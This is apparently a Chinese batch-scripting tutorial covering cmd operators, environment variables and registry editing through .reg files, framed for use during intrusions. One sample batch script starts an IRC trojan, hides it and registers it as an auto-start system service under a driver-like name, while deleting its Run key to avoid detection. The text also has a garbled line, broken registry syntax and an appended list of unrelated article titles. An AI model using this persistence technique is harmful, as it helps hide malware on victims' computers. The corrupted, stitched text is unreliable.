1.&
Usage:第一条命令 & 第二条命令 [& 第三条命令...]
用这种方法可以同时执行多条命令,而不管命令是否执行成功

2.&&
Usage:第一条命令 && 第二条命令 [&& 第三条命令...]
用这种方法可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则
一直执行完所有命令;
3.||
Usage:第一条命令 || 第二条命令 [|| 第三条命令...]
用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的
命令则一直执行完所有命令;
1.| 命令
Usage:第一条命令 | 第二条命令 [| 第三条命令...]
将第一条命令的结果作为第二条命令的参数来使用,记得在unix中这种方式很常见。
2.>,>>输出重定向命令
将一条命令或某个程序输出结果的重定向到特定文件中, > 与 >>的区别在于,>会清除调原有文件中的内
容后写入指定文件,而>>只会追加内容到指定文件中,而不会改动其中的内容。
3.< , >& , <&
< 从文件中而不是从键盘中读入命令输入。
>& 将一个句柄的输出写入到另一个句柄的输入中。
<& 从一个句柄读取输入并将其写入到另一个句柄输出中。
使用命令重定向操作符可以使用重定向操作符将命令输入和输出数据流从默认位置重定向到其他位置。输入或输出数据流的位置称为句柄。
下表将列出可用的句柄。
句柄       句柄的数字代号描述
STDIN     0 键盘输入
STDOUT    1 输出到命令提示符窗口
STDERR    2 错误输出到命令提示符窗口
UNDEFINED 3-9 句柄由应用程序单独定义,它们是各个工具特有的
 
变量 类型 描述

%ALLUSERSPROFILE%

局部

返回“所有用户配置文件”的位置。

%APPDATA%

局部

返回默认情况下应用程序存储数据的位置。

%CD%

局部

返回当前目录字符串。

%CMDCMDLINE%

局部

返回用来启动当前的 Cmd.exe 的准确命令行。

%CMDEXTVERSION%

系统

返回当前的“命令处理程序扩展”的版本号。

%COMPUTERNAME%

系统

返回计算机的名称。

%COMSPEC%

系统

返回命令行解释器可执行程序的准确路径。

%DATE%

系统

返回当前日期。使用与date /t命令相同的格式。由 Cmd.exe 生成。有关 date 命令的详细信息,请参阅 Date。

%ERRORLEVEL%

系统

返回上一条命令的错误代码。通常用非零值表示错误。

%HOMEDRIVE%

系统

返回连接到用户主目录的本地工作站驱动器号。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。

%HOMEPATH%

系统

返回用户主目录的完整路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。

%HOMESHARE%

系统

返回用户的共享主目录的网络路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。

%LOGONSERVER%

局部

返回验证当前登录会话的域控制器的名称。

%NUMBER_OF_PROCESSORS%

系统

指定安装在计算机上的处理器的数目。

%OS%

系统

返回操作系统名称。Windows 2000 会将该操作系统显示为 Windows NT。

%PATH%

系统

指定可执行文件的搜索路径。

%PATHEXT%

系统

返回操作系统认为可执行的文件扩展名的列表。

%PROCESSOR_ARCHITECTURE%

系统

返回处理器的芯片体系结构。值:x86 或 IA64(基于 Itanium)。

%PROCESSOR_IDENTFIER%

系统

返回处理器说明。

%PROCESSOR_LEVEL%

系统

返回计算机上安装的处理器的型号。

%PROCESSOR_REVISION%

系统

返回处理器的版本号。

%PROMPT%

局部

返回当前解释程序的命令提示符设置。由 Cmd.exe 生成。

%RANDOM%

系统

返回 0 到 32767 之间的任意十进制数字。由 Cmd.exe 生成。

%SYSTEMDRIVE%

系统

返回包含 Windows 服务器操作系统根目录(即系统根目录)的驱动器。

%SYSTEMROOT%

系统

返回 Windows 服务器操作系统目录的位置。

%TEMP% 和 %TMP%

系统和用户

返回对当前登录用户可用的应用程序所使用的默认临时目录。有些应用程序需要 TEMP,而其他应用程序则需要 TMP。

%TIME%

系统

返回当前时间。使用与 time /t 命令相同的格式。由 Cmd.exe 生成。有关 time 命令的详细信息,请参阅 Time。

%USERDOMAIN%

局部

返回包含用户帐户的域的名称。

%USERNAME%

局部

返回当前登录的用户的名称。

%USERPROFILE%

局部

返回当前用户的配置文件的位置。

%WINDIR%

系统

返回操作系统目录的位置。

  1. | 命令
  Usage:第一条命令 | 第二条命令 [| 第三条命令...]
  将第一条命令的结果作为第二条命令的参数来使用,记得在unix中这种方式很常见。
  sample:

time /t>>D://IP.log
netstat -n -p tcp|find ":3389">>D://IP.log
start Explorer

  看出来了么?用于终端服务允许我们为用户自定义起始的程序,来实现让用户运行下面这个bat,以获得登录用户的IP。

  2. >、>>输出重定向命令
  将一条命令或某个程序输出结果的重定向到特定文件中, > 与 >>的区别在于,>会清除调原有文件中的内容后写入指定文件,而>>只会追加内容到指定文件中,而不会改动其中的内容。
  sample1

echo hello world>c://hello.txt (stupid example?)

  sample2:
  时下DLL木马盛行,我们知道system32是个捉迷藏的好地方,许多木马都削尖了脑袋往那里钻,DLL马也不例外,针对这一点我们可以在安装好系统和必要的应用程序后,对该目录下的EXE和DLL文件作一个记录:运行CMD--转换目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中,日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了.这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行:
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好,如果有的话也不要直接DEL掉,先用regsvr32 /u trojan.dll将后门DLL文件注销掉,再把它移到回收站里,若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。

  3. < 、>& 、<&
  < 从文件中而不是从键盘中读入命令输入。
  >& 将一个句柄的输出写入到另一个句柄的输入中。
  <& 从一个句柄读取输入并将其写入到另一个句柄输出中。
  这些并不常用,也就不多做介绍。

  五.如何用批处理文件来操作注册表

  在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)关于注册表的操作,常见的是创建、修改、删除。

  1.创建
  一种是创建子项(Subkey)。我们创建一个文件,内容如下:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//hacker]

  然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft下创建了一个名字为“hacker”的子项。

  另一种是创建一个项目名称。那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Run]
3q6] G t k,Q0"Invader"="Ex4rch"
"Door"=C:////WINNT////system32door.exe
"Autodos"=dword:02

  这样就在[HKEY_LOCAL_MACHINE/ SOFTWARE/ Microsoft/ Windows/ CurrentVersion/ Run]下新建了:Invader、door、about这三个项目
  Invader的类型是“String value”,door的类型是“REG SZ value”,Autodos的类型是“DWORD value”

  2.修改
  修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。

  3.删除
  我们首先来说说删除一个项目名称,我们创建一个如下的文件:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Run]
"Ex4rch"=-

  执行该脚本,[HKEY_LOCAL_MACHINE/ SOFTWARE/ Microsoft/ /Windows/ CurrentVersion/ Run]下的"Ex4rch"就被删除了;

  我们再看看删除一个子项,我们创建一个如下的脚本:

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Run]

  执行该脚本,[HKEY_LOCAL_MACHINE/ SOFTWARE/ Microsoft/ Windows/ CurrentVersion/ Run]就已经被删除了。

  相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。

  samlpe1:如上面的那个例子,如想生成如下注册表文件

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要这样:
@echo Windows Registry Editor Version 5.00>>Sample.reg

@echo [HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Run]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C:WINNTsystem32door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg

  samlpe2:
  我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE/ SOFTWARE/ Microsoft/ Windows/ CurrentVersion/ Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe)

@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c://winnt//system32//windrv32.exe
@regedit /s patch.dll
@delete patch.dll

@REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]
@REM 这样不是更安全^_^.

cmd 组合命令和管道命令的使用相关推荐

  1. Linux 命令之管道命令

    Linux 命令之管道命令 | Persus & Xie 学习管道之前我们先了解一下Linux的命令执行顺序 命令执行顺序控制 通常情况下,我们在终端中只能执行一条命令,然后按下回车执行,那么 ...

  2. 定向输出命令_网络工程师之linux重定向命令和管道命令详解

    如果这篇文章对您有帮助,请关注并点赞,感谢您的支持,如果还有其他问题,请私信给我 今天来讲解linux下">"输入/输出重定向和管道命令 1.输入/输出重定向命令基本格式:c ...

  3. linux命令 (管道命令)

    管道命令 cut sort wc uniq tree tr split awk sed grep 1.cut 1.1目标 cut 根据条件 从命令结果中 提取 对应内容. 1.2实现 第一步: 截取出 ...

  4. shell中一些特殊命令|: 管道命令。;;在前一个命令结束时,而忽略其返回值,继续执行下一個命令。

    shell传递参数 $0 对应的是当前 Shell 脚本程序的名称,$#对应的是总共有几个参数,$*对应的是所有位置的参数值,$?对应的是显示上一次命令的执行返回值,而$1.$2.$3--则分别对应着 ...

  5. Linux系统编程:pipe匿名管道的使用,实现linux命令下管道命令

    pipe函数介绍 函数原型int pipe(int pipefd[2]) 来创建匿名管道; 传出2个fd 文件描述符,pipefd[0]表示匿名管道的读端,pipefd[1]表示匿名管道的写端.有这个 ...

  6. linux怎么打出管道命令这个符号,linux 管道命令 竖线 ‘ | ’

    管道符号,是unix功能强大的一个地方,符号是一条竖线:"|", 用法: command 1 | command 2 他的功能是把第一个命令command 1执行的结果作为comm ...

  7. 图解“管道过滤器模式”应用实例:SOD框架的命令执行管道

    管道和过滤器 管道和过滤器是八种体系结构模式之一,这八种体系结构模式是:层.管道和过滤器.黑板.代理者.模型-视图-控制器(MVC) 表示-抽象-控制(PAC).微核.映像. 管道和过滤器适用于需要渐 ...

  8. linux命令竖是什么,linux 管道命令 竖线 ‘ | ’

    管道符号,是unix功能强大的一个地方,符号是一条竖线:"|", 用法: command 1 | command 2 他的功能是把第一个命令command 1执行的结果作为comm ...

  9. Linux管道命令(pipe)

    学习管道之前我们先了解一下linux的命令执行顺序 命令执行顺序控制 通常情况下,我们在终端只能执行一条命令,然后按下回车执行,那么如何执行多条命令呢? 顺序执行多条命令:command1;comma ...

最新文章

  1. php根据修改时间删除指定目录下文件
  2. other-如何可以查看别人请求的输出结果
  3. Python教程:如何将list嵌套的list的[]去掉
  4. 基于flink+clickhouse构建亿级电商全端用户画像平台训练营
  5. head first Design Pattern State
  6. dotnet 手工打一个 dotnet tool 包
  7. VisualStudio运行C++项目检测include<stdio.h>报错解决方案
  8. 深入浅出WPF之Binding的使用(二)
  9. Dom4j完整教程~DOM4J简介
  10. C++ 虚函数表解析 继承
  11. oracle tnsnames.ora文件用法说明
  12. 骑马与砍杀服务器修复,骑马与砍杀修复存档损坏的办法
  13. 三星手机怎么看html5,高端手机什么样?看三星S20 FE 5G就知道了
  14. Shell 把日志记录按天切割到不同的文件
  15. PPT高级教程及技巧
  16. 详细解析Photoshop10个必学的抠图技巧
  17. 小学生测验(Java)
  18. Linux shell脚本中分号的作用
  19. 5G消息(RCS),到底是什么?
  20. 盘企lcms php开发框架,LCMS操作 · 盘企LCMS PHP开发框架文档 · 看云

热门文章

  1. 解释内存中的栈(stack)、堆(heap)和静态区(static area)的用法
  2. ssm框架搭建过程中的bug(石乐志)
  3. 苏亚星显示没有登录的服务器,VOD直播工具使用 直播站管理工具的使用 苏亚星VOD点播(直播)系统.doc...
  4. mysql在线考试的设计_在线考试系统设计与实现(MySQL)
  5. BP 神经网络的数据分类
  6. 初识Rabbit消息队列
  7. Candy -- LeetCode
  8. Vuforia examples 简介
  9. 倍福EK1110模块介绍
  10. 迈动互联中标中建集团